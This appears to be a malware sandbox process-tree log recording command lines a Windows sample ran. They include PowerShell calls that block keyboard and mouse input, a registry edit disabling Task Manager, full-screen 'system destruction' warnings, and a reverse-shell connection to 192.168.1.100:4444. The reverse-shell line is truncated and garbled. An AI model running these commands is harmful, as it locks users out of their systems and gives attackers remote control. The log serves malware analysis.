        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        37⤵
        
        PID:5216
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fjavaykx\fjavaykx.cmdline"
        38⤵
        
        PID:5960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        37⤵
        
        PID:4376
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5keb1jfz\5keb1jfz.cmdline"
        38⤵
        
        PID:5560
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD8BC.tmp" "c:\Users\Admin\AppData\Local\Temp\5keb1jfz\CSC29A504E895D64B5E996CFB4986CFCB7.TMP"
        39⤵
        
        PID:6824
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        37⤵
        
        PID:5088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        37⤵
        
        PID:2136
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iksgh10g\iksgh10g.cmdline"
        38⤵
        
        PID:6072
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE109.tmp" "c:\Users\Admin\AppData\Local\Temp\iksgh10g\CSCF1BCE98898A044CC821B91FCEE4358A0.TMP"
        39⤵
        
        PID:7092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        37⤵
        
        PID:6560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        35⤵
        
        PID:5260
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f3njnan5\f3njnan5.cmdline"
        36⤵
        
        PID:5616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        35⤵
        
        PID:6912
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\33mc4xke\33mc4xke.cmdline"
        36⤵
        
        PID:6224
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF56.tmp" "c:\Users\Admin\AppData\Local\Temp\33mc4xke\CSC849A34A9FA5048FBBA41698C6E1AB3F7.TMP"
        37⤵
        
        PID:5132
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        35⤵
        
        PID:5976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        35⤵
        
        PID:5536
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bdx0wji2\bdx0wji2.cmdline"
        36⤵
        
        PID:5936
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD5CE.tmp" "c:\Users\Admin\AppData\Local\Temp\bdx0wji2\CSC92FB5F2EA9D44FCC8C852FC124A8B6B0.TMP"
        37⤵
        
        PID:5728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        35⤵
        
        PID:7092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        33⤵
        
        PID:2828
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wtujq4iy\wtujq4iy.cmdline"
        34⤵
        
        PID:5224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        33⤵
        
        PID:6640
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wktcuv3n\wktcuv3n.cmdline"
        34⤵
        
        PID:6956
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD282.tmp" "c:\Users\Admin\AppData\Local\Temp\wktcuv3n\CSC53770E56FE774E12874299DD52452664.TMP"
        35⤵
        
        PID:6336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        33⤵
        
        PID:7048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        33⤵
        
        PID:5760
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hbzzdisn\hbzzdisn.cmdline"
        34⤵
        
        PID:6624
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9C6.tmp" "c:\Users\Admin\AppData\Local\Temp\hbzzdisn\CSC295433232A9C47FB9C6C95C5AD2EA840.TMP"
        35⤵
        
        PID:6800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        33⤵
        
        PID:5896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        31⤵
        
        PID:5680
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pjj1q5rd\pjj1q5rd.cmdline"
        32⤵
        
        PID:5504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        31⤵
        
        PID:6740
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dsx2j13c\dsx2j13c.cmdline"
        32⤵
        
        PID:6184
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC66D.tmp" "c:\Users\Admin\AppData\Local\Temp\dsx2j13c\CSC1D2CC4C0E8C84112B42932E3FF47F962.TMP"
        33⤵
        
        PID:6296
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        31⤵
        
        PID:972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        31⤵
        
        PID:1264
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zdlkdfje\zdlkdfje.cmdline"
        32⤵
        
        PID:6824
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC97.tmp" "c:\Users\Admin\AppData\Local\Temp\zdlkdfje\CSC2A652EDC745649D3B06F83ED3EAB6583.TMP"
        33⤵
        
        PID:5760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        31⤵
        
        PID:4444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        31⤵
        
        PID:9020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        29⤵
        
        PID:5696
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\opvih1ev\opvih1ev.cmdline"
        30⤵
        
        PID:5292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        29⤵
        
        PID:6888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rog44tip\rog44tip.cmdline"
        30⤵
        
        PID:7004
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC9A9.tmp" "c:\Users\Admin\AppData\Local\Temp\rog44tip\CSCF0C94BE2D8D24944BEC3E79F224D695C.TMP"
        31⤵
        
        PID:6976
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        29⤵
        
        PID:5908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        29⤵
        
        PID:7128
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\45ijq3n5\45ijq3n5.cmdline"
        30⤵
        
        PID:4360
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD09E.tmp" "c:\Users\Admin\AppData\Local\Temp\45ijq3n5\CSCF50A8B0BE74B4883B87A61C1D7A9DAC2.TMP"
        31⤵
        
        PID:6008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        29⤵
        
        PID:5324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        27⤵
        
        PID:5036
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\frv0s0kn\frv0s0kn.cmdline"
        28⤵
        
        PID:5216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        27⤵
        
        PID:5540
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q0s40sk5\q0s40sk5.cmdline"
        28⤵
        
        PID:6488
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBDA3.tmp" "c:\Users\Admin\AppData\Local\Temp\q0s40sk5\CSCB083EB36AFAA4588937DBD8D8165B516.TMP"
        29⤵
        
        PID:6612
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        27⤵
        
        PID:7092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        27⤵
        
        PID:6404
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xv1jplj0\xv1jplj0.cmdline"
        28⤵
        
        PID:7060
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC38E.tmp" "c:\Users\Admin\AppData\Local\Temp\xv1jplj0\CSC9D07DC6A9FF489EB35257C6276CA80.TMP"
        29⤵
        
        PID:6292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        27⤵
        
        PID:5860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        25⤵
        
        PID:1128
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afn05ygs\afn05ygs.cmdline"
        26⤵
        
        PID:5036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        25⤵
        
        PID:5248
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w0evsro0\w0evsro0.cmdline"
        26⤵
        
        PID:4816
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB798.tmp" "c:\Users\Admin\AppData\Local\Temp\w0evsro0\CSC967D19B7AFC9480781415D21E71B2E5A.TMP"
        27⤵
        
        PID:5428
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        25⤵
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        25⤵
        
        PID:1736
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lokbt2tb\lokbt2tb.cmdline"
        26⤵
        
        PID:6876
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE8D.tmp" "c:\Users\Admin\AppData\Local\Temp\lokbt2tb\CSC142BD727B5BD4860B429F86411D2687.TMP"
        27⤵
        
        PID:6920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        25⤵
        
        PID:6484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        25⤵
        
        PID:8556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        23⤵
        
        PID:3688
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h1m45yvr\h1m45yvr.cmdline"
        24⤵
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        23⤵
        
        PID:3368
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x335423n\x335423n.cmdline"
        24⤵
        
        PID:5248
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB323.tmp" "c:\Users\Admin\AppData\Local\Temp\x335423n\CSC7B2B82A597A4F74BED1A6A9DE2ADAC6.TMP"
        25⤵
        
        PID:4644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        23⤵
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
